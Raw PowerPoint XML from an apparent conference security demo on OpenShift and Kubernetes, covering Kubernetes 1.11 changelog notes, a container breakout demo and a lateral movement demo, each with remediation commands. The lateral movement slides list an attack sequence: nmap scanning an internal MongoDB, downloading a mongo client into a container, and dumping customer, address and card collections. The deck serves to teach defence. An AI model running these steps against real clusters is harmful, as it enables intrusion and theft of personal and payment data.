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58" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="273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070" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="117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7A1E-C70D-470C-8980-F4393258158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36465-81AD-4D5C-97C7-E4F933718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kubernetes/pull/65739" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/pull/65799" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/krunaljai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ubernetes/kubernetes/pull/65499" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bsalamat" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes-csi.github.io/docs/Drivers.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/pull/65593" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dekkagaijin" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/liggit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Supported k8s versions on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aks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Version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Changelog(s) 1.11:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.11.md#changelog-since-v1119</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Considerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> changes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>action required: the API server and client-go libraries have been fixed to support additional non-alpha-numeric characters in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> "extra" data keys. Both should be updated in order to properly support extra data containing "/" characters or other characters disallowed in HTTP headers. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>#65799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dekkagaijin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)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https://github.com/kubernetes/autoscaler/releases/tag/cluster-autoscaler-1.3.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ACTION REQUIRED: Removes defaulting of CSI file system type to ext4. All the production drivers listed under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://kubernetes-csi.github.io/docs/Drivers.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> were inspected and should not be impacted after this change. If you are using a driver not in that list, please test the drivers on an updated test cluster first. ``` (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>#65499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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>krunaljain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kube-apiserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: the Priority admission plugin is now enabled by default when using --enable-admission-plugins. If using --admission-control to fully specify the set of admission plugins, the Priority admission plugin should be added if using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PodPriority</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> feature, which is enabled by default in 1.11. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>#65739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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>liggitt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system-node-critical and system-cluster-critical priority classes are now limited to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-system namespace by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PodPriority</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> admission plugin. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>#65593</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>bsalamat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36465-81AD-4D5C-97C7-E4F933718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29FE-3067-425C-BB62-250DE2A431FA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EECF-AB53-4D15-B74E-34444FB0C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23" y="1256179"/>
            <a:ext cx="6705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Lateral movement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 – set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projects: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projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lookup service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(look for user-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smtClean="0"/>
              <a:t>) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/>
              <a:t>get service -n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sock-shop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Show container used + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scc’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> needed for it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cat 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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Start container and enter it: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smtClean="0"/>
              <a:t>network-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>utils.yaml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>network-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>utils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1 – set stage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24759"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9331325" y="1120775"/>
          <a:ext cx="13192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Packager Shell Object" showAsIcon="1" r:id="rId4" imgW="1318680" imgH="527400" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId4" imgW="13186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1325" y="1120775"/>
                        <a:ext cx="1319213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82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Lateral movement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Check availability from within container (in other project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) &lt;- TODO: not feasible with -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p27017 --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mongodb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-databases 172.30.2.17 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download mongo binary, connect to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in container:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl fastdl.mongodb.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/mongodb-linux-x86_64-4.0.10.tgz --resolve fastdl.mongodb.org:80:52.222.167.194 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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mongodb-linux-x86_64-4.0.10.tgz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>./mongodb-linux-x86_64-4.0.10/bin/mongo 172.30.2.17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search for interesting data: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dbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show collections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db.customers.find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db.addresses.find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db.cards.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigate (as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ocp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>system:admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, needs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openshift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ovs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-multitenant SDN plugin!):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pod-network isolate-projects sock-shop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222155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9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text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35114"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3711575" y="3940175"/>
          <a:ext cx="139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Packager Shell Object" showAsIcon="1" r:id="rId3" imgW="1396800" imgH="527400" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId3" imgW="139680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1575" y="3940175"/>
                        <a:ext cx="1397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7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remediation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56681"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8940800" y="1025525"/>
          <a:ext cx="1758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ackager Shell Object" showAsIcon="1" r:id="rId4" imgW="1758240" imgH="527400" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId4" imgW="17582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40800" y="1025525"/>
                        <a:ext cx="17589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32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demo OCP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demo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cat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apply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(wait until run through)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>breakout</a:t>
            </a:r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 smtClean="0"/>
              <a:t>adm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-review -z default -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>container_breakout.yaml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remove-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-from-user privileged -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-review -z default -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>container_breakout.yaml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(to add again: )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>oc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> policy add-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-to-user privileged -z default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37675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text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14169"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5131550" y="3155933"/>
          <a:ext cx="1524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Packager Shell Object" showAsIcon="1" r:id="rId3" imgW="1523880" imgH="527400" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId3" imgW="15238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1550" y="3155933"/>
                        <a:ext cx="15240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220"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7697300" y="3155933"/>
          <a:ext cx="1933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Packager Shell Object" showAsIcon="1" r:id="rId5" imgW="1934280" imgH="527400" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId5" imgW="193428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300" y="3155933"/>
                        <a:ext cx="19335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1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breakout remediation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45623"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9155356" y="764381"/>
          <a:ext cx="191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Packager Shell Object" showAsIcon="1" r:id="rId4" imgW="1914840" imgH="527400" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId4" imgW="19148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5356" y="764381"/>
                        <a:ext cx="19145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02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5-03T09:19:29;;HvS|"/>
  <p:tag name="A71660D270C64F5BBB8F27F5E85BE630" val="1"/>
  <p:tag name="ISFOXLABELINGONTITLEPAGESET" val="True"/>
  <p:tag name="ISFOXDOCUMENTCLASSIFICATIONVERSION" val="1"/>
  <p:tag name="ISFOXLABELUSERINTERACTION" val="True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70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Packager Shell Object</vt:lpstr>
      <vt:lpstr>Package</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Breakout demo OCP</vt:lpstr>
      <vt:lpstr>Breakout demo commands</vt:lpstr>
      <vt:lpstr>Container breakout 1</vt:lpstr>
      <vt:lpstr>Container breakout 2</vt:lpstr>
      <vt:lpstr>Container breakout 3</vt:lpstr>
      <vt:lpstr>Container breakout result</vt:lpstr>
      <vt:lpstr>Container breakout text</vt:lpstr>
      <vt:lpstr>Container breakout remediation</vt:lpstr>
      <vt:lpstr>Lateral movement demo</vt:lpstr>
      <vt:lpstr>Lateral movement commands – set stage</vt:lpstr>
      <vt:lpstr>Movement 1 – set stage</vt:lpstr>
      <vt:lpstr>Lateral movement commands</vt:lpstr>
      <vt:lpstr>Movement 2</vt:lpstr>
      <vt:lpstr>Movement 3</vt:lpstr>
      <vt:lpstr>Movement text</vt:lpstr>
      <vt:lpstr>Movement remediation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Grams</dc:creator>
  <cp:keywords>Public;</cp:keywords>
  <cp:lastModifiedBy>Lukas Grams</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-03T07:18:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-14T14:44:08Z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